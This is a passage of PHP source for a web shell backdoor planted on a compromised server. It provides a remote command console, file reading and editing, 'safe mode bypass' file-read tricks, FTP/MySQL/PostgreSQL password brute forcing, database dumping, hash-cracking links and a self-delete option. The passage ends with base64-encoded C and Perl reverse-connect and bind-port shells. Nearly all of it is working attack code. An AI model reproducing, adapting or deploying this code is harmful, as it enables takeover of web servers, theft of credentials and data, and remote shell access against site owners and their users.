| if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}} | |
| if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} | |
| if(isset($_POST['ajax'])) { | |
| ob_start(); | |
| if(function_exists($_POST['p1'])) | |
| echo $_POST['p1']($_POST['p2']); | |
| $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; | |
| echo strlen($temp), "\n", $temp; | |
| exit; | |
| } | |
| echo '<h1>String conversions</h1><div class=content>'; | |
| $stringTools = array( | |
| 'Base64 encode' => 'base64_encode', | |
| 'Base64 decode' => 'base64_decode', | |
| 'Url encode' => 'urlencode', | |
| 'Url decode' => 'urldecode', | |
| 'Full urlencode' => 'full_urlencode', | |
| 'md5 hash' => 'md5', | |
| 'sha1 hash' => 'sha1', | |
| 'crypt' => 'crypt', | |
| 'CRC32' => 'crc32', | |
| 'ASCII to HEX' => 'ascii2hex', | |
| 'HEX to ASCII' => 'hex2ascii', | |
| 'HEX to DEC' => 'hexdec', | |
| 'HEX to BIN' => 'hex2bin', | |
| 'DEC to HEX' => 'dechex', | |
| 'DEC to BIN' => 'decbin', | |
| 'BIN to HEX' => 'bin2hex', | |
| 'BIN to DEC' => 'bindec', | |
| 'String to lower case' => 'strtolower', | |
| 'String to upper case' => 'strtoupper', | |
| 'Htmlspecialchars' => 'htmlspecialchars', | |
| 'String length' => 'strlen', | |
| ); | |
| echo "<form name='toolsForm' onSubmit='a(null,null,this.selectTool.value,this.input.value); return false;'><select name='selectTool'>"; | |
| foreach($stringTools as $k => $v) | |
| echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; | |
| echo "</select><input type='submit' value='>>'/><br><textarea name='input' style='margin-top:5px' class=bigarea></textarea></form><pre class='ml1' style='display:none;margin-top:5px' id='strOutput'></pre></div>"; | |
| ?> | |
| <br><h1>Search for hash:</h1><div class=content> | |
| <form method='post' target='_blank' name="hf"> | |
| <input type="text" name="hash" style="width:200px;"><br> | |
| <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br> | |
| <input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()"><br> | |
| <input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br> | |
| <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br> | |
| <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br> | |
| </form> | |
| </div> | |
| <?php | |
| } | |
| function actionFilesTools() { | |
| if( isset($_POST['p1']) ) | |
| $_POST['p1'] = urldecode($_POST['p1']); | |
| if( @$_POST['p2']!='download' && @$_POST['p2'] != 'mkfile' ) { | |
| echo '<h1>File tools</h1><div class=content>'; | |
| if( !file_exists(@$_POST['p1']) ) { | |
| echo 'File not exists'; | |
| return; | |
| } | |
| $uid = @posix_getpwuid(@fileowner($_POST['p1'])); | |
| $gid = @posix_getgrgid(@fileowner($_POST['p1'])); | |
| echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; | |
| echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; | |
| if( empty($_POST['p2']) ) | |
| $_POST['p2'] = 'view'; | |
| if( is_file($_POST['p1']) ) | |
| $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); | |
| else | |
| $m = array('Chmod', 'Rename', 'Touch'); | |
| foreach($m as $v) | |
| echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; | |
| echo '<br><br>'; | |
| } | |
| switch($_POST['p2']) { | |
| case 'view': | |
| echo '<pre class=ml1>'; | |
| $fp = @fopen($_POST['p1'], 'r'); | |
| if($fp) { | |
| while( !@feof($fp) ) | |
| echo htmlspecialchars(@fread($fp, 1024)); | |
| @fclose($fp); | |
| } | |
| echo '</pre>'; | |
| break; | |
| case 'highlight': | |
| if( is_readable($_POST['p1']) ) { | |
| echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; | |
| $code = highlight_file($_POST['p1'],true); | |
| echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; | |
| } | |
| break; | |
| case 'download': | |
| if(is_file($_POST['p1']) && is_readable($_POST['p1'])) { | |
| header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); | |
| if (function_exists("mime_content_type")) { | |
| $type = @mime_content_type($_POST['p1']); | |
| header("Content-Type: ".$type); | |
| } | |
| $fp = @fopen($_POST['p1'], "r"); | |
| if($fp) { | |
| while(!@feof($fp)) | |
| echo @fread($fp, 1024); | |
| fclose($fp); | |
| } | |
| } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) { | |
| } | |
| exit; | |
| break; | |
| case 'chmod': | |
| if( !empty($_POST['p3']) ) { | |
| $perms = 0; | |
| for($i=strlen($_POST['p3'])-1;$i>=0;--$i) | |
| $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); | |
| if(!@chmod($_POST['p1'], $perms)) | |
| echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; | |
| else | |
| die('<script>g(null,null,null,null,"")</script>'); | |
| } | |
| echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; | |
| break; | |
| case 'edit': | |
| if( !is_writable($_POST['p1'])) { | |
| echo 'File isn\'t writeable'; | |
| break; | |
| } | |
| if( !empty($_POST['p3']) ) { | |
| @file_put_contents($_POST['p1'],$_POST['p3']); | |
| echo 'Saved!<br><script>document.mf.p3.value="";</script>'; | |
| } | |
| echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>'; | |
| $fp = @fopen($_POST['p1'], 'r'); | |
| if($fp) { | |
| while( !@feof($fp) ) | |
| echo htmlspecialchars(@fread($fp, 1024)); | |
| @fclose($fp); | |
| } | |
| echo '</textarea><input type=submit value=">>"></form>'; | |
| break; | |
| case 'hexdump': | |
| $c = @file_get_contents($_POST['p1']); | |
| $n = 0; | |
| $h = array('00000000<br>','',''); | |
| $len = strlen($c); | |
| for ($i=0; $i<$len; ++$i) { | |
| $h[1] .= sprintf('%02X',ord($c[$i])).' '; | |
| switch ( ord($c[$i]) ) { | |
| case 0: $h[2] .= ' '; break; | |
| case 9: $h[2] .= ' '; break; | |
| case 10: $h[2] .= ' '; break; | |
| case 13: $h[2] .= ' '; break; | |
| default: $h[2] .= $c[$i]; break; | |
| } | |
| $n++; | |
| if ($n == 32) { | |
| $n = 0; | |
| if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} | |
| $h[1] .= '<br>'; | |
| $h[2] .= "\n"; | |
| } | |
| } | |
| echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; | |
| break; | |
| case 'rename': | |
| if( !empty($_POST['p3']) ) { | |
| if(!@rename($_POST['p1'], $_POST['p3'])) | |
| echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>'; | |
| else | |
| die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); | |
| } | |
| echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; | |
| break; | |
| case 'touch': | |
| if( !empty($_POST['p3']) ) { | |
| $time = strtotime($_POST['p3']); | |
| if($time) { | |
| if(@touch($_POST['p1'],$time,$time)) | |
| die('<script>g(null,null,null,null,"")</script>'); | |
| else { | |
| echo 'Fail!<script>document.mf.p3.value="";</script>'; | |
| } | |
| } else echo 'Bad time format!<script>document.mf.p3.value="";</script>'; | |
| } | |
| echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; | |
| break; | |
| case 'mkfile': | |
| if(!file_exists($_POST['p1'])) { | |
| $fp = @fopen($_POST['p1'], 'w'); | |
| if($fp) | |
| die('<script>g(null,null,null,"edit")</script>'); | |
| } | |
| echo 'Can\'t create!'; | |
| break; | |
| } | |
| echo '</div>'; | |
| } | |
| function actionSafeMode() { | |
| if( isset($_POST['ajax']) ) { | |
| ob_start(); | |
| switch($_POST['p1']) { | |
| case 1: | |
| $temp=@tempnam($test, 'cx'); | |
| if(@copy("compress.zlib://".$_POST['p2'], $temp)){ | |
| echo @file_get_contents($temp); | |
| unlink($temp); | |
| } else | |
| echo 'Sorry... Can\'t open file'; | |
| break; | |
| case 2: | |
| $files = glob($_POST['p2'].'*'); | |
| if( is_array($files) ) | |
| foreach ($files as $filename) | |
| echo $filename."\n"; | |
| break; | |
| case 3: | |
| $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); | |
| curl_exec($ch); | |
| break; | |
| case 4: | |
| ini_restore("safe_mode"); | |
| ini_restore("open_basedir"); | |
| include($_POST['p2']); | |
| break; | |
| case 5: | |
| for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { | |
| $uid = posix_getpwuid($_POST['p2']); | |
| if ($uid) | |
| echo join(':',$uid)."\n"; | |
| } | |
| break; | |
| case 6: | |
| if(!function_exists('imap_open'))break; | |
| $stream = imap_open($_POST['p2'], "", ""); | |
| if ($stream == FALSE) | |
| break; | |
| echo imap_body($stream, 1); | |
| imap_close($stream); | |
| break; | |
| } | |
| $temp = "document.getElementById('Output').style.display='';document.getElementById('Output').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; | |
| echo strlen($temp), "\n", $temp; | |
| exit; | |
| } | |
| echo '<h1>Safe mode bypass</h1><div class=content>'; | |
| echo '<span>Copy (read file)</span><form onsubmit=\'a(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'a(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'a(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'a(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'a(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'a(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><pre class="ml1" style="display:none;margin-top:5px" id="Output"></pre>'; | |
| echo '</div>'; | |
| } | |
| function actionConsole() { | |
| if(isset($_POST['ajax'])) { | |
| ob_start(); | |
| echo "document.cf.cmd.value='';\n"; | |
| $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0")); | |
| if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { | |
| if(@chdir($match[1])) { | |
| $GLOBALS['cwd'] = @getcwd(); | |
| echo "document.mf.c.value='".$GLOBALS['cwd']."';"; | |
| } | |
| } | |
| echo "document.cf.output.value+='".$temp."';"; | |
| echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; | |
| $temp = ob_get_clean(); | |
| echo strlen($temp), "\n", $temp; | |
| exit; | |
| } | |
| ?> | |
| <script> | |
| if(window.Event) window.captureEvents(Event.KEYDOWN); | |
| var cmds = new Array(""); | |
| var cur = 0; | |
| function kp(e) { | |
| var n = (window.Event) ? e.which : e.keyCode; | |
| if(n == 38) { | |
| cur--; | |
| if(cur>=0) | |
| document.cf.cmd.value = cmds[cur]; | |
| else | |
| cur++; | |
| } else if(n == 40) { | |
| cur++; | |
| if(cur < cmds.length) | |
| document.cf.cmd.value = cmds[cur]; | |
| else | |
| cur--; | |
| } | |
| } | |
| function add(cmd) { | |
| cmds.pop(); | |
| cmds.push(cmd); | |
| cmds.push(""); | |
| cur = cmds.length-1; | |
| } | |
| </script> | |
| <?php | |
| echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);a(null,null,this.cmd.value);return false;"><select name=alias>'; | |
| foreach($GLOBALS['aliases'] as $n => $v) { | |
| if($v == '') { | |
| echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; | |
| continue; | |
| } | |
| echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; | |
| } | |
| echo '</select><input type=button onclick="add(document.cf.alias.value);a(null,null,document.cf.alias.value);" value=">>"><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; | |
| if(!empty($_POST['p1'])) | |
| echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); | |
| echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">'; | |
| echo '</form></div><script>document.cf.cmd.focus();</script>'; | |
| } | |
| function actionLogout() { | |
| unset($_SESSION['sh_logined']); | |
| die('<script>location.reload();</script>'); | |
| } | |
| function actionSelfRemove() { | |
| if($_POST['p1'] == 'yes') { | |
| if(@unlink(SELF_PATH)) | |
| die('Shell has been removed'); | |
| else | |
| echo 'unlink error!'; | |
| } | |
| echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; | |
| } | |
| function actionBruteforce() { | |
| if( isset($_POST['proto']) ) { | |
| echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; | |
| if( $_POST['proto'] == 'ftp' ) { | |
| function bruteForce($ip,$port,$login,$pass) { | |
| $fp = @ftp_connect($ip, $port?$port:21); | |
| if(!$fp) return false; | |
| $res = @ftp_login($fp, $login, $pass); | |
| @ftp_close($fp); | |
| return $res; | |
| } | |
| } elseif( $_POST['proto'] == 'mysql' ) { | |
| function bruteForce($ip,$port,$login,$pass) { | |
| $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); | |
| @mysql_close($res); | |
| return $res; | |
| } | |
| } elseif( $_POST['proto'] == 'pgsql' ) { | |
| function bruteForce($ip,$port,$login,$pass) { | |
| $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''"; | |
| $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass); | |
| @pg_close($res); | |
| return $res; | |
| } | |
| } | |
| $success = 0; | |
| $attempts = 0; | |
| $server = explode(":", $_POST['server']); | |
| if($_POST['type'] == 1) { | |
| $temp = @file('/etc/passwd'); | |
| if( is_array($temp) ) | |
| foreach($temp as $line) { | |
| $line = explode(":", $line); | |
| ++$attempts; | |
| if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { | |
| $success++; | |
| echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; | |
| } | |
| if(@$_POST['reverse']) { | |
| $tmp = ""; | |
| for($i=strlen($line[0])-1; $i>=0; --$i) | |
| $tmp .= $line[0][$i]; | |
| ++$attempts; | |
| if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { | |
| $success++; | |
| echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); | |
| } | |
| } | |
| } | |
| } elseif($_POST['type'] == 2) { | |
| $temp = @file($_POST['dict']); | |
| if( is_array($temp) ) | |
| foreach($temp as $line) { | |
| $line = trim($line); | |
| ++$attempts; | |
| if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { | |
| $success++; | |
| echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; | |
| } | |
| } | |
| } | |
| echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; | |
| } | |
| echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' | |
| .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' | |
| .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' | |
| .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' | |
| .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' | |
| .'<span>Server:port</span></td>' | |
| .'<td><input type=text name=server value="127.0.0.1"></td></tr>' | |
| .'<tr><td><span>Brute type</span></td>' | |
| .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' | |
| .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' | |
| .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' | |
| .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' | |
| .'<td><input type=text name=login value="root"></td></tr>' | |
| .'<tr><td><span>Dictionary</span></td>' | |
| .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' | |
| .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; | |
| echo '</div><br>'; | |
| } | |
| function actionSql() { | |
| class DbClass { | |
| var $type; | |
| var $link; | |
| var $res; | |
| function DbClass($type) { | |
| $this->type = $type; | |
| } | |
| function connect($host, $user, $pass){ | |
| switch($this->type) { | |
| case 'mysql': | |
| if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; | |
| break; | |
| } | |
| return false; | |
| } | |
| function selectdb($db) { | |
| switch($this->type) { | |
| case 'mysql': | |
| if (@mysql_select_db($db))return true; | |
| break; | |
| } | |
| return false; | |
| } | |
| function query($str) { | |
| switch($this->type) { | |
| case 'mysql': | |
| return $this->res = @mysql_query($str); | |
| break; | |
| } | |
| return false; | |
| } | |
| function fetch() { | |
| $res = func_num_args()?func_get_arg(0):$this->res; | |
| switch($this->type) { | |
| case 'mysql': | |
| return @mysql_fetch_assoc($res); | |
| break; | |
| } | |
| return false; | |
| } | |
| function listDbs() { | |
| switch($this->type) { | |
| case 'mysql': | |
| return $this->res = @mysql_list_dbs($this->link); | |
| break; | |
| } | |
| return false; | |
| } | |
| function setCharset($str) { | |
| switch($this->type) { | |
| case 'mysql': | |
| if(function_exists('mysql_set_charset')) | |
| return @mysql_set_charset($str, $this->link); | |
| else | |
| $this->query('SET CHARSET '.$str); | |
| break; | |
| } | |
| return false; | |
| } | |
| function dump($table) { | |
| switch($this->type) { | |
| case 'mysql': | |
| $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); | |
| $create = mysql_fetch_array($res); | |
| echo $create[1].";\n\n"; | |
| $this->query('SELECT * FROM `'.$table.'`'); | |
| while($item = $this->fetch()) { | |
| $columns = array(); | |
| foreach($item as $k=>$v) { | |
| $item[$k] = "'".@mysql_real_escape_string($v)."'"; | |
| $columns[] = "`".$k."`"; | |
| } | |
| echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; | |
| } | |
| break; | |
| } | |
| return false; | |
| } | |
| }; | |
| $db = new DbClass('mysql'); | |
| if(@$_POST['p2']=='download') { | |
| $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass']); | |
| $db->selectdb($_POST['sql_base']); | |
| header("Content-Disposition: attachment; filename=dump.sql"); | |
| header("Content-Type: text/plain"); | |
| foreach($_POST['tbl'] as $v) | |
| //if(preg_match('!table_(.*)!', $k, $table)) | |
| $db->dump($v); | |
| exit; | |
| } | |
| ?> | |
| <h1>Sql browser</h1><div class=content> | |
| <form name="sf" method="post"> | |
| <table cellpadding="2" cellspacing="0"> | |
| <tr> | |
| <td>Host</td> | |
| <td>Login</td> | |
| <td>Password</td> | |
| <td>Database</td> | |
| <td></td> | |
| </tr> | |
| <tr> | |
| <input type=hidden name=a value=Sql> | |
| <input type=hidden name=p1 value='query'> | |
| <input type=hidden name=p2> | |
| <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'> | |
| <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> | |
| <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td> | |
| <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td> | |
| <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td> | |
| <td> | |
| <?php | |
| $tmp = "<input type=text name=sql_base value=''>"; | |
| if(isset($_POST['sql_host'])){ | |
| if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'])) { | |
| switch($_POST['charset']) { | |
| case "Windows-1251": $db->setCharset('cp1251'); break; | |
| case "UTF-8": $db->setCharset('utf8'); break; | |
| case "KOI8-R": $db->setCharset('koi8r'); break; | |
| case "KOI8-U": $db->setCharset('koi8u'); break; | |
| case "cp866": $db->setCharset('cp866'); break; | |
| } | |
| $db->listDbs(); | |
| echo "<select name=sql_base><option value=''></option>"; | |
| while($item = $db->fetch()) { | |
| list($key, $value) = each($item); | |
| echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; | |
| } | |
| } | |
| else echo $tmp; | |
| }else | |
| echo $tmp; | |
| ?></td> | |
| <td><input type=submit value=">>"></td> | |
| </tr> | |
| </table> | |
| <script> | |
| function st(t) { | |
| document.sf.p1.value = 'select'; | |
| document.sf.p2.value = ''; | |
| document.sf.p3.value = t; | |
| document.sf.submit(); | |
| } | |
| </script> | |
| <?php | |
| if(isset($db) && $db->link){ | |
| echo "<table width=100% cellpadding=2 cellspacing=0>"; | |
| if(!empty($_POST['sql_base'])){ | |
| $db->selectdb($_POST['sql_base']); | |
| echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>"; | |
| $db->query("show tables"); | |
| while($item = $db->fetch()) { | |
| list($key, $value) = each($item); | |
| echo "<nobr><input type='checkbox' name='tbl[]' value='".htmlspecialchars($value)."'> <a href=# onclick=\"st('".$value."')\">".$value."</a></nobr><br>"; | |
| } | |
| echo "<input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>"; | |
| if(@$_POST['p1'] == 'select') { | |
| $_POST['p1'] = 'query'; | |
| $_POST['p3'] = 'SELECT * FROM `'.$_POST['p3'].'` LIMIT 0,30'; | |
| } | |
| echo "<textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>"; | |
| if(@$_POST['p1'] == 'query') { | |
| $db->query(@$_POST['p3']); | |
| if($db->res !== false) { | |
| $title = false; | |
| echo '<table width=100% cellspacing=0 cellpadding=2 class=main style="margin-top:5px">'; | |
| $line = 1; | |
| while($item = $db->fetch()) { | |
| if(!$title) { | |
| echo '<tr>'; | |
| foreach($item as $key => $value) | |
| echo '<th>'.$key.'</th>'; | |
| reset($item); | |
| $title=true; | |
| echo '</tr><tr>'; | |
| $line = 2; | |
| } | |
| echo '<tr class="l'.$line.'">'; | |
| $line = $line==1?2:1; | |
| foreach($item as $key => $value) { | |
| if($value == null) | |
| echo '<td><i>null</i></td>'; | |
| else | |
| echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; | |
| } | |
| echo '</tr>'; | |
| } | |
| echo '</table>'; | |
| } | |
| } | |
| echo "</td></tr>"; | |
| } | |
| echo "</table></form><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; | |
| if(@$_POST['p1'] == 'loadfile') { | |
| $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file"); | |
| $file = $db->fetch(); | |
| echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; | |
| } | |
| } | |
| echo '</div>'; | |
| } | |
| function actionNetwork() { | |
| $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; | |
| $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; | |
| $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzb2NrZmQsIG5ld2ZkLCBpOw0KICAgIGNoYXIgcGFzc1szMF07DQogICAgc3RydWN0IHNvY2thZGRyX2luIHJlbW90ZTsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzb2NrZmQgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighc29ja2ZkKQ0KICAgICAgICByZXR1cm4gLTE7DQogICAgcmVtb3RlLnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KICAgIHJlbW90ZS5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHJlbW90ZS5zaW5fYWRkci5zX2FkZHIgPSBodG9ubChJTkFERFJfQU5ZKTsNCiAgICBiaW5kKHNvY2tmZCwgKHN0cnVjdCBzb2NrYWRkciAqKSZyZW1vdGUsIDB4MTApOw0KICAgIGxpc3Rlbihzb2NrZmQsIDUpOw0KICAgIHdoaWxlKDEpIHsNCiAgICAgICAgbmV3ZmQ9YWNjZXB0KHNvY2tmZCwwLDApOw0KICAgICAgICBkdXAyKG5ld2ZkLDApOw0KICAgICAgICBkdXAyKG5ld2ZkLDEpOw0KICAgICAgICBkdXAyKG5ld2ZkLDIpOw0KICAgICAgICB3